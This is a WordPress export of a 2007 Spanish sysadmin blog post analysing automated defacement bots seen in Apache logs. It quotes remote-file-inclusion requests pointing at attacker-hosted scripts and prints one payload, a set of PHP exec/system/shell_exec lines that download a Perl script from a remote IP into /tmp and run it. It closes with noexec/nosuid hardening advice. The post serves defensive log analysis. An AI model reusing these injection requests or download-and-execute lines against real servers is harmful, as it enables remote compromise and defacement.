{"id":440,"date":"2007-07-10T19:03:03","date_gmt":"2007-07-10T19:03:03","guid":{"rendered":"http:\/\/blografia.net\/vicm3\/?p=440"},"modified":"2007-07-10T19:03:03","modified_gmt":"2007-07-10T19:03:03","slug":"robots_defacers","status":"publish","type":"post","link":"https:\/\/blografia.net\/vicm3\/2007\/07\/robots_defacers\/","title":{"rendered":"Robots defacers"},"content":{"rendered":"<p>A ultimas fechas me he encontrado con que los defacers y\/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl<\/p>\n<p>[code=&#8217;Bash&#8217;]<br \/>\ndominioatacado.com:75.126.134.16 &#8211; &#8211; [10\/Jul\/2007:01:34:30 -0500] \u00abGET \/guruforo\/index.php\/modules\/Forums\/admin\/admin_styles.php?phpb<br \/>\nb_root_path=http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\u00bb 200 56485 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\ndominioatacado.com:75.126.134.16 &#8211; &#8211; [10\/Jul\/2007:10:07:56 -0500] \u00abGET \/guruforo\/index.php\/MOD_forum_fields_parse.php?phpbb_root_path<br \/>\n=http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\u00bb 200 56480 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\ndominioatacado.com:64.92.199.49 &#8211; &#8211; [10\/Jul\/2007:09:18:29 -0500] \u00abGET \/ HTTP\/1.0\u00bb 200 8571 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\ndominioatacado.com:64.92.199.37 &#8211; &#8211; [10\/Jul\/2007:09:24:19 -0500] \u00abGET \/ HTTP\/1.0\u00bb 200 8571 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\nlegiondominioatacado.com:81.34.160.119 &#8211; &#8211; [10\/Jul\/2007:05:49:59 -0500] \u00abGET \/perlyell.gif HTTP\/1.0\u00bb 200 750 \u00abhttp:\/\/www.legion<br \/>\ndominioatacado.com\/index3.html\u00bb \u00abMozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)\u00bb<br \/>\nlegiondominioatacado.com:201.159.1.60 &#8211; &#8211; [10\/Jul\/2007:17:58:35 -0500] \u00abGET \/perlyell.gif HTTP\/1.1\u00bb 200 750 \u00abhttp:\/\/www.legiona<br \/>\ndominioatacado.com\/index3.html\u00bb \u00abMozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)\u00bb<br \/>\ndominioatacado.com:80.247.202.176 &#8211; &#8211; [10\/Jul\/2007:05:16:30 -0500] \u00abGET \/portal\/index2.php?_REQUEST=&#038;_REQUEST%5boption%5d=com_co<br \/>\nntent&#038;_REQUEST%5bItemid%5d=1&#038;GLOBALS=&#038;mosConfig_absolute_path=http:\/\/www.eclypse.info\/img\/ec.gif? HTTP\/1.1\u00bb 200 28 \u00ab-\u00bb \u00ablibwww<br \/>\n-perl\/5.803\u00bb<br \/>\ndominioatacado.com:80.247.202.176 &#8211; &#8211; [10\/Jul\/2007:05:16:34 -0500] \u00abGET \/portal\/index.php?_REQUEST=&#038;_REQUEST%5boption%5d=com_con<br \/>\ntent&#038;_REQUEST%5bItemid%5d=1&#038;GLOBALS=&#038;mosConfig_absolute_path=http:\/\/www.eclypse.info\/img\/ec.gif? HTTP\/1.1\u00bb 200 28 \u00ab-\u00bb \u00ablibwww-<br \/>\nperl\/5.803\u00bb<br \/>\ndominioatacado.com:208.53.170.15 &#8211; &#8211; [10\/Jul\/2007:02:55:33 -0500] \u00abGET \/portal2\/\/index2.php?showpage=http:\/\/85.114.143.143\/dai<br \/>\nsy\/robotto.txt?? HTTP\/1.1\u00bb 200 604 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\ndominioatacado.com:208.53.170.15 &#8211; &#8211; [10\/Jul\/2007:03:01:23 -0500] \u00abGET \/portal2\/\/index2.php?showpage=http:\/\/85.114.143.143\/dai<br \/>\nsy\/robotto.txt?? HTTP\/1.1\u00bb 200 604 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\ndominioatacado.com:65.98.55.194 &#8211; &#8211; [10\/Jul\/2007:03:01:24 -0500] \u00abGET \/portal2\/\/index2.php?showpage=http:\/\/85.114.143.143\/dais<br \/>\ny\/robotto.txt?? HTTP\/1.1\u00bb 200 604 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb<br \/>\n[\/code]<\/p>\n<p>Todo con libwww-perl :D<\/p>\n<p>Y pues de ahi ya llaman a shells, backdoors, bots y otras cochinadas, sin embargo me parecio un tanto interesante el que ahora automaticen y que hasta parezca que tiene un batch de diferentes pruebas para diferentes scripts (de hecho solo postee lo que dio 202, tengo un monton de 404, pero haria crecer este post)<\/p>\n<p>http:\/\/85.114.143.143\/daisy\/robotto.txt<br \/>\n[code=&#8217;PHP&#8217;]<br \/>\n echo exec(&#8216;cd \/tmp;curl http:\/\/85.114.143.143\/daisy\/unix.txt -o b;perl b;rm b;&#8217;);<br \/>\necho exec(&#8216;cd \/tmp;GET http:\/\/85.114.143.143\/daisy\/unix.txt>b;perl b;rm b;&#8217;);<br \/>\necho exec(&#8216;cd \/tmp;wget http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho exec(&#8216;cd \/tmp;fetch http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho passthru(&#8216;cd \/tmp;fetch http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho passthru(&#8216;cd \/tmp;wget http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho passthru(&#8216;cd \/tmp;curl http:\/\/85.114.143.143\/daisy\/unix.txt -o b;perl b;rm b;&#8217;);<br \/>\necho passthru(&#8216;cd \/tmp;GET http:\/\/85.114.143.143\/daisy\/unix.txt>b;perl b;rm b;&#8217;);<br \/>\necho system(&#8216;cd \/tmp;curl http:\/\/85.114.143.143\/daisy\/unix.txt -o b;perl b;rm b;&#8217;);<br \/>\necho system(&#8216;cd \/tmp;GET http:\/\/85.114.143.143\/daisy\/unix.txt>b;perl b;rm b;&#8217;);<br \/>\necho system(&#8216;cd \/tmp;wget http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho system(&#8216;cd \/tmp;fetch http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho shell_exec(&#8216;cd \/tmp;curl http:\/\/85.114.143.143\/daisy\/unix.txt -o b;perl b;rm b;&#8217;);<br \/>\necho shell_exec(&#8216;cd \/tmp;GET http:\/\/85.114.143.143\/daisy\/unix.txt>b;perl b;rm b;&#8217;);<br \/>\necho shell_exec(&#8216;cd \/tmp;wget http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\necho shell_exec(&#8216;cd \/tmp;fetch http:\/\/85.114.143.143\/daisy\/unix.txt;mv unix.txt b;perl b;rm b;&#8217;);<br \/>\n[\/code]<\/p>\n<p>Claro que mucho de esto nomas con tener \/tmp con noexec y nosuid pues ha dejado fuera estos scripts, sin embargo muchos seguro no han contado con que a ultimas fechas tambien se puede usar \/dev\/shm para intentar usar esto (asi que no es mala idea en el fstab tener \/tmp y \/dev\/shm como noexec y nosuid)<\/p>\n<p>En todo caso me pregunto por que mod_security no ha llegado a Etch. :\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A ultimas fechas me he encontrado con que los defacers y\/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl [code=&#8217;Bash&#8217;] dominioatacado.com:75.126.134.16 &#8211; &#8211; [10\/Jul\/2007:01:34:30 -0500] \u00abGET \/guruforo\/index.php\/modules\/Forums\/admin\/admin_styles.php?phpb b_root_path=http:\/\/floydz.imess.net\/cmd.txt? HTTP\/1.1\u00bb 200 56485 \u00ab-\u00bb \u00ablibwww-perl\/5.805\u00bb dominioatacado.com:75.126.134.16 &#8211; &#8211; &hellip; <a href=\"https:\/\/blografia.net\/vicm3\/2007\/07\/robots_defacers\/\">Sigue leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-440","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":606,"url":"https:\/\/blografia.net\/vicm3\/2008\/11\/estaba-pensando-en\/","url_meta":{"origin":440,"position":0},"title":"Estaba pensando en","author":"vicm3","date":"16 noviembre, 2008","format":false,"excerpt":"Aprovechar que la p\u00e1gina de la UPN esta creada con drupal (de paso fijandome que no han sido para quitar el favicon.ico default), para a\u00f1adir al sitio de moodle que estamos utilizando el rss de las noticias de la pagina para lo cual pues como tengo el firefox como default\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":277,"url":"https:\/\/blografia.net\/vicm3\/2006\/04\/mod_security-2\/","url_meta":{"origin":440,"position":1},"title":"Mod_security","author":"vicm3","date":"26 abril, 2006","format":false,"excerpt":"En algun momento mencione algo de esto... y la razon de por que lo estaba poniendo en mis maquinas... un buen ejemplo paso hace poco que no tenia oportunidad de actualizar una aplicaci\u00f3n pero existia una manera de explotarla pero yo no podia parcharla hasta estar seguro, esto me planteaba\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":533,"url":"https:\/\/blografia.net\/vicm3\/2008\/03\/y-seguimos-con-los-bots-exploiters\/","url_meta":{"origin":440,"position":2},"title":"Y seguimos con los bots exploiters","author":"vicm3","date":"6 marzo, 2008","format":false,"excerpt":"Para variar los exploiters automatizados siguen usando libwww-perl... bueno en lighttpd ya lo resolvi, anoche cai en cuenta que tambien en apache estaba teniendo muchas peticiones de estas... y todavia tengo 3 apaches en maquinas relativamente grandes, pero me parece que es un desperdicio de conexiones para la mas peque\u00f1a\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":256,"url":"https:\/\/blografia.net\/vicm3\/2006\/03\/y_bueno_aunque_nadie_ha_preguntado\/","url_meta":{"origin":440,"position":3},"title":"Y bueno aunque nadie ha preguntado&#8230;","author":"vicm3","date":"25 marzo, 2006","format":false,"excerpt":"El otro dia le preguntaba a Gunnar si lo que me ayudo a hacer con mi DB de convertir de utf8 a latin1, se podria aplicar a texto, plano mas especificamente a un index.html, por cierto pongo el codigo como quedo por que me parece muy eficiente y bueno (y\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1068,"url":"https:\/\/blografia.net\/vicm3\/2013\/06\/legacy-code-everywhere\/","url_meta":{"origin":440,"position":4},"title":"Legacy code everywhere","author":"vicm3","date":"19 junio, 2013","format":false,"excerpt":"From last weekend our blog lacobachab where not updating their feed, as I removed and updated wp-cache info, most probably I removed redundant entries on .htaccess, BUT looks like removed the correct ones and left the wrong ones, tip if you don't know if your .htaccess mod_rewrite rules are OK,\u2026","rel":"","context":"En \u00abDebraye\u00bb","block_context":{"text":"Debraye","link":"https:\/\/blografia.net\/vicm3\/category\/debraye\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":624,"url":"https:\/\/blografia.net\/vicm3\/2009\/02\/est-maana\/","url_meta":{"origin":440,"position":5},"title":"Est\u00e1 ma\u00f1ana","author":"vicm3","date":"15 febrero, 2009","format":false,"excerpt":"Ya no lo recordaba, pero apticron tuvo a bien anunciarme esta ma\u00f1ana: The following packages are currently pending an upgrade: adduser 3.110 apache2-utils 2.2.9-10+lenny2 apt 0.7.20.2 apticron 1.1.27 aptitude 0.4.11.11-1~lenny1 apt-listchanges 2.83 apt-utils 0.7.20.2 at 3.1.10.2 awstats 6.7.dfsg-5.1 base-files 5 base-passwd 3.5.20 bash 3.2-4 bind9-host 1:9.5.1.dfsg.P1-1 binutils 2.18.1~cvs20080103-7 bsd-mailx 8.1.2-0.20071201cvs-3\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/blografia.net\/vicm3\/category\/sin-categoria\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/comments?post=440"}],"version-history":[{"count":0,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/posts\/440\/revisions"}],"wp:attachment":[{"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/media?parent=440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/categories?post=440"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blografia.net\/vicm3\/wp-json\/wp\/v2\/tags?post=440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}